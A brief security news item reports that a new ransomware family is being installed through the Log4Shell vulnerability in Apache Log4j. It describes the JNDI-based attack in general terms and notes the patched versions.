New Ransomware Family Deployed in Log4Shell Attacks

Recently a public exploit for the major zero-day vulnerability known as ‘Log4Shell’ in the Apache Log4j Java-based logging platform has been made available.

Log4j is a development platform that enables developers to include error and event logging into Java applications.

Threat actors can exploit the vulnerability by generating unique JNDI strings that, when read by Log4j, force the platform to connect to and execute code at the provided URL. This makes it simple for attackers to discover susceptible devices and execute code given by a remote site or via Base64 encoded messages.

What Happened?

Researchers have identified the first public incidence of the Log4j Log4Shell vulnerability being leveraged to download and install malware.

While this vulnerability was patched in Log4j 2.15.0 and even hardened further in Log4j 2.16.0, threat actors are still using it to install malware such as currency miners, botnets, and even Cobalt Strike beacons.

BitDefender researchers discovered the first ransomware family being installed directly using Log4Shell vulnerabilities.

While most of the attacks observed so far seem to be targeting Linux servers, we have also seen attacks against systems running the Windows operating system. For these attacks, we have detected the attempt to deploy a ransomware family

Read More: